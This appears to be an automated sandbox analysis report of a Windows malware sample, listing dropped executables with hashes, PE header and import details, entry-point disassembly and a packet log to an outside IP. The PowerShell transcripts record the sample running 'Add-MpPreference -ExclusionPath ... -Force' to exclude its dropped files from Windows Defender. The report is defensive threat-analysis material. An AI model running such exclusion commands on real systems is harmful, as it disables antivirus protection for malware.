Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	337526
Entropy (8bit):	7.9995115513758694
Encrypted:	true
SSDEEP:	6144:L4jf7mxbARk98hS8OhVA67OTd0QRjzL64c6pGZbcCFGCfturJs3kIijr7kRPcesU:Er7wQmmKatzLa6pGZACgCV6y/ifARPck
MD5:	0404B5AD6A19CCAAA4439AE82DEED9E4
SHA1:	B2988B0245A62FF4A1AF2316BD8589DFA437E65F
SHA-256:	13C6B54B1D1C16B81A89D8A73C4E02A7EAE35D7FF93CF78EEC4F457DE1F45B81
SHA-512:	24C5310147C1CEE2F10C7EECC5904FB4B67EE2981B860315F441D4D06D356697129C53C26A75EC0EC26E2AC1E3E744A0FF4DD50AC8D6B5D787D8B00416196C1E
Malicious:	false
Reputation:	unknown
Preview:	.....RK}q.Y`.m}..sU.Vt..H.i...?.r........!...{.......8..........8..,i......-../...H.v.1..D.....q^...?..l..k..............{.s...N....HQ.....s.3]..s..n.vf....$..._%r..O.-.^C.F.\..R.cXk...G..s\..H.R6..J...`%.L..TT.7.....Y..........M\..].n..L................I..bsc..;...L%H.T.$.-.O...>.d....5.5.%h.B.CU.%..l....w.%i....,!..0.z...]&.G.C....#^.Q....R..D6....W<y....@.N....t..4[....K..Oy.<`.......{.>y@..I..#.5AN<C...lLM{]..L..G(.Y.U.&.JY[-9z..B.....Z.C.....C[..(.n1...........C..-^..HpD...m.}..Cf....;..S....`..bH(..q..?..-..O...I......}].JM5..@..........i.5..VP..t....FL.i...pT.U.!wG....HX.....:.....j..z....QB...)o'....?.R..bWI..Bn\|;....x.I=/.2..~o..4..-..[".?..)`E.d...V_.+........ve..2..[MB..C.5.n...........q@..j.p...s.....L.R.@<......duS.f...G..]..f!...9.#..opR.....\...@...K3T...1~F...=l.LU.r..K...Kv.BL.~..p.03...}...&%....g.;.7.]`Lr=..R...s....-.n:.N..~{.:.c._......P.#.>\.-Hm.<..dd...l.".x.d.s..)...w.<...T^W(9<.U.J)0a..N..&.5..#..Fd.F..6.<.d

C:\Users\user\AppData\Roaming\iwbavbe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	349184
Entropy (8bit):	5.990570703899727
Encrypted:	false
SSDEEP:	6144:KsJKwfGUwb7+K6jGYVG+tYuibQCMe/SEEt:K6bte7P6jGYV/tYuiP/S
MD5:	537AD79DD97C59FCD1DF5D8A26256192
SHA1:	7D43F8A6C25934E4299316AD7C9C8E8CE61416E3
SHA-256:	17BB183C9E8F262C2BD91228E788F4613279C795573B558C3981501EE02811BA
SHA-512:	C2E2E59F7E1E88F4DFA9284D44E5BFB55EECA41F488129822612A333B6D2DE18277444BE33BBC10D5120F77E957503712286B7AB10FD08DE0437536E48584538
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.-=`.Cn`.Cn`.Cn...nL.Cn...nB.Cn...n..Cni..ni.Cn`.Bn..Cn...na.Cn...na.Cn...na.CnRich`.Cn........................PE..L...f.._......................v...................@...........................z.............................................\...d....py..I....................y..... ...................................@............................................text...b........................... ..`.data...H.u.........................@....rsrc....I...py..J..................@..@.reloc..P$....y..&..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\iwbavbe:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\ssbavbe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	212992
Entropy (8bit):	6.734269361613487
Encrypted:	false
SSDEEP:	3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
MD5:	73252ACB344040DDC5D9CE78A5D3A4C2
SHA1:	3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
SHA-256:	B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
SHA-512:	1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\20211029\PowerShell_transcript.051829.XMHajm8l.20211029205029.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5801
Entropy (8bit):	5.393525821520638
Encrypted:	false
SSDEEP:	96:BZijEeNrqDo1ZzZCjEeNrqDo1ZWMiUjZUjEeNrqDo1ZhBkkZZa:VSGx
MD5:	E213D624498589C9606B3456434A6733
SHA1:	31D9902899CF71B03700E5611E109BF5C223513B
SHA-256:	0AF7DF4399713D1A4388CA68FE6B4CAE09A8D39E62121F7D5DC919CA74C30035
SHA-512:	5F752AA173FBB73294D58EF6ED5FEEFF8FE83C08A71A694345A154B8E394EF2A90160AAB7C6605E6F730864AECB76D1C95D8982A2F686066C301DD4D8CF373DE
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211029205033..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp\69B.exe -Force..Process ID: 6116..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211029205033..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp\69B.exe -Force..********************..Windows PowerShell transcript start..Start time: 20211029205503..Username: computer\user..RunAs User: DESKTOP-716T77

C:\Users\user\Documents\20211029\PowerShell_transcript.051829.lpXoBn7C.20211029205045.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24:BxSAK7vBZEex2DOXUWeSuafPWWZHjeTKKjX4CIym1ZJXQuafP6:BZAvjEeoO+S/pZqDYB1ZS/S
MD5:	EB11A4AB86F407E732D2DEE9D3E838C1
SHA1:	F527A3450E8125A7D440C558DBBDBA4D74F5E753
SHA-256:	516B78AC1155B1AEB39FC464A94E3923B441D1B0B338DB1B105E52FEE2D56FB2
SHA-512:	494D8D73A32BA808AF37FE943707239BCA57ABA980847EDC97AECDFBB3CB7F07C7534C67B3C18EE2B61083D792F0FA23F37DA9C11A983445E49BA10B26D68811
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211029205053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 051829 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp\3C84.exe -Force..Process ID: 5680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211029205053..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp\3C84.exe -Force..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.990570703899727
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	F7E3DjYJpC.exe
File size:	349184
MD5:	537ad79dd97c59fcd1df5d8a26256192
SHA1:	7d43f8a6c25934e4299316ad7c9c8e8ce61416e3
SHA256:	17bb183c9e8f262c2bd91228e788f4613279c795573b558c3981501ee02811ba
SHA512:	c2e2e59f7e1e88f4dfa9284d44e5bfb55eeca41f488129822612a333b6d2de18277444be33bbc10d5120f77e957503712286b7ab10fd08de0437536e48584538
SSDEEP:	6144:KsJKwfGUwb7+K6jGYVG+tYuibQCMe/SEEt:K6bte7P6jGYV/tYuiP/S
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.-=`.Cn`.Cn`.Cn...nL.Cn...nB.Cn...n..Cni..ni.Cn`.Bn..Cn...na.Cn...na.Cn...na.CnRich`.Cn........................PE..L...f.._...

File Icon


Icon Hash:	aedaae9ecea62aa2

Static PE Info

General
Entrypoint:	0x41c890
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5F02BB66 [Mon Jul 6 05:49:26 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	8554f137e95e1371295faad9355adee2

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007EFF148A066Bh
call 00007EFF1489B4B6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043C730h
push 004217B0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [0043E4A0h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401068h]
cmp dword ptr [02B95444h], 00000000h
jne 00007EFF1489B4B0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [004010FCh]
call 00007EFF1489B633h
mov dword ptr [ebp-6Ch], eax
call 00007EFF148A391Bh
test eax, eax
jne 00007EFF1489B4ACh
push 0000001Ch
call 00007EFF1489B5F0h
add esp, 04h
call 00007EFF148A3278h
test eax, eax
jne 00007EFF1489B4ACh
push 00000010h
call 00007EFF1489B5DDh
add esp, 04h
push 00000001h
call 00007EFF148A31C3h
add esp, 04h
call 00007EFF148A0FDBh
mov dword ptr [ebp-04h], 00000000h
call 00007EFF1489FE6Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cd5c	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2797000	0x4998	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x279c000	0x1ba4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1bc90	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3c862	0x3ca00	False	0.596709890464	data	6.97839927821	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x3e000	0x2758448	0x1600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2797000	0x4998	0x4a00	False	0.695576435811	data	6.15350032067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x279c000	0x12450	0x12600	False	0.0814466411565	data	1.05012917221	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x27972a0	0x25a8	data	Spanish	Paraguay
RT_ICON	0x2799848	0x10a8	data	Spanish	Paraguay
RT_STRING	0x279aa30	0x72	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x279aaa8	0x5d2	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x279b080	0x7ea	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x279b870	0x128	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x279a980	0x90	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x279a918	0x68	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x279a8f0	0x22	data	Spanish	Paraguay
None	0x279aa20	0xa	data	Divehi; Dhivehi; Maldivian	Maldives
None	0x279aa10	0xa	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL	Import
KERNEL32.dll	GetCPInfo, HeapAlloc, InterlockedIncrement, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, GetNamedPipeHandleStateA, SetHandleInformation, FindFirstFileExW, LockFile, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, GetTickCount, IsBadReadPtr, CreateActCtxW, TlsSetValue, ActivateActCtx, SetFileShortNameW, ReadConsoleInputA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GetModuleFileNameW, GetSystemDirectoryA, GetStartupInfoW, VerifyVersionInfoW, GetLastError, GetLongPathNameW, GetDriveTypeW, GetProcAddress, FindVolumeMountPointClose, WriteProfileSectionA, FindClose, GetPrivateProfileStringA, OpenWaitableTimerA, LocalAlloc, QueryDosDeviceW, WriteProfileSectionW, GlobalGetAtomNameW, SetSystemTime, GetModuleFileNameA, FindFirstChangeNotificationA, FreeEnvironmentStringsW, BuildCommDCBA, GetCurrentDirectoryA, CompareStringA, GetConsoleCursorInfo, SetProcessShutdownParameters, TlsAlloc, GetWindowsDirectoryW, FileTimeToLocalFileTime, GetProfileSectionW, AreFileApisANSI, DeleteFileA, CloseHandle, SetStdHandle, SetLastError, GetConsoleAliasesLengthW, FlushFileBuffers, MoveFileA, GetCommandLineW, HeapSetInformation, InterlockedDecrement, DecodePointer, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, WriteFile, GetStdHandle, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapValidate, TlsGetValue, TlsFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryW, RtlUnwind, RaiseException, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CreateFileW
USER32.dll	GetMenuInfo
GDI32.dll	GetBitmapBits
WINHTTP.dll	WinHttpReadData

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Paraguay
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2021 20:49:29.953269005 CEST	49764	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.005404949 CEST	80	49764	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.006160975 CEST	49764	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.006201982 CEST	49764	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.006206989 CEST	49764	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.085879087 CEST	80	49764	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.086007118 CEST	49764	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.094863892 CEST	49764	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.146940947 CEST	80	49764	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.454289913 CEST	49765	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.507734060 CEST	80	49765	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.507925987 CEST	49765	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.508136988 CEST	49765	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.508177042 CEST	49765	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.561598063 CEST	80	49765	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.585098982 CEST	80	49765	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.585201979 CEST	49765	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.585658073 CEST	49765	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.628360987 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.638935089 CEST	80	49765	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.680917025 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.681154013 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.681339979 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.774904013 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827225924 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827255011 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827267885 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827280998 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827299118 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827315092 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827333927 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827351093 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827368021 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827387094 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.827475071 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.827523947 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.880199909 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880224943 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880243063 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880259991 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880278111 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880294085 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880311012 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880311966 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.880330086 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880347013 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880357981 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.880364895 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.880393028 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.880424976 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.880436897 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881037951 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881088972 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.881644011 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881664038 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881680012 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881697893 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881715059 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881720066 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.881732941 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881750107 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881764889 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.881766081 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.881815910 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.932768106 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.932794094 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.932811022 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.932827950 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.932876110 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.932898998 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933231115 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933248043 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933264971 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933281898 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933300972 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933332920 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933348894 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933366060 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933386087 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933403015 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933418989 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933425903 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933435917 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933453083 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933459997 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933504105 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933506966 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933537006 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933547020 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933553934 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933572054 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933588028 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933598995 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933604956 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933621883 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933624029 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933640957 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933656931 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.933656931 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.933710098 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.934077978 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.934106112 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.934129953 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.934154034 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.965477943 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965502024 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965519905 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965537071 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965552092 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.965553999 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965569973 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965580940 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.965589046 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965606928 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965645075 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.965686083 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965733051 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.965754986 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965795994 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965812922 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.965841055 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985342979 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985379934 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985399961 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985414028 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985416889 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985436916 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985454082 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985462904 CEST	49766	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:30.985476017 CEST	80	49766	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:30.985503912 CEST	80	49766	185.98.87.159	192.168.2.4
